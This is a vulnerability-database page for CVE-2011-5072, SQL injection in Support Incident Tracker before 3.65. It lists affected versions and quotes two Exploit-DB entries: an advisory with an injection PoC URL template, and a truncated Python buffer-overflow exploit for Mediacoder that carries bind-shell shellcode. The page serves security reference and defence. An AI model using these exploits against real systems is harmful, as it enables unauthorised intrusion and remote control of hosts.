CVE-2011-5072
published 2012-01-29CVE-2011-5072: Multiple SQL injection vulnerabilities in Support Incident Tracker (aka SiT!) before 3.65 allow remote attackers to execute arbitrary SQL commands via the (1)…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.11%
61.9th percentile
Multiple SQL injection vulnerabilities in Support Incident Tracker (aka SiT!) before 3.65 allow remote attackers to execute arbitrary SQL commands via the (1) start parameter to portal/kb.php; (2) contractid parameter to contract_add_service.php; (3) id parameter to edit_escalation_path.php; (4) unlock, (5) lock, or (6) selected parameter to holding_queue.php; inc parameter in a report action to (7) report_customers.php or (8) report_incidents_by_site.php; (9) start parameter to search.php; or (10) sites parameter to transactions.php.
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sitracker | support_incident_tracker | <= 3.64 | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
| sitracker | support_incident_tracker | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
sit! support incident tracker 3.64 - Multiple Vulnerabilities
exploitdb·2012-02-01
CVE-2011-5074 sit! support incident tracker 3.64 - Multiple Vulnerabilities
sit! support incident tracker 3.64 - Multiple Vulnerabilities
---
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
2) Input passed via the "contractid" GET parameter to contract_add_service.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecti
Exploit-DB
Mediacoder 2011 RC3 - '.m3u' Local Buffer Overflow
exploitdb·2011-03-20
Mediacoder 2011 RC3 - '.m3u' Local Buffer Overflow
Mediacoder 2011 RC3 - '.m3u' Local Buffer Overflow
---
# Exploit Title: Mediacoder 2011 RC3 0-days Exploit
# Google Dork: --
# Date: 20 / 3 / 2011
# Author: Oh Yaw Theng
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=filemirror.s7icky.com&file=MediaCoder2011-RC3-5072.exe
# Version: 2011 RC3
# Tested on: Windows XP SP2
# CVE : --
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 256
esp = "\x65\x82\xA5\x7C"
nops = "\x90" * 25
# The payload will bind a shell at Port 5555
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x
No writeups or analysis indexed.
http://secunia.com/advisories/46019http://sitracker.org/wiki/ReleaseNotes365http://www.securityfocus.com/archive/1/519636https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.htmlhttp://secunia.com/advisories/46019http://sitracker.org/wiki/ReleaseNotes365http://www.securityfocus.com/archive/1/519636https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html
2012-01-29
Published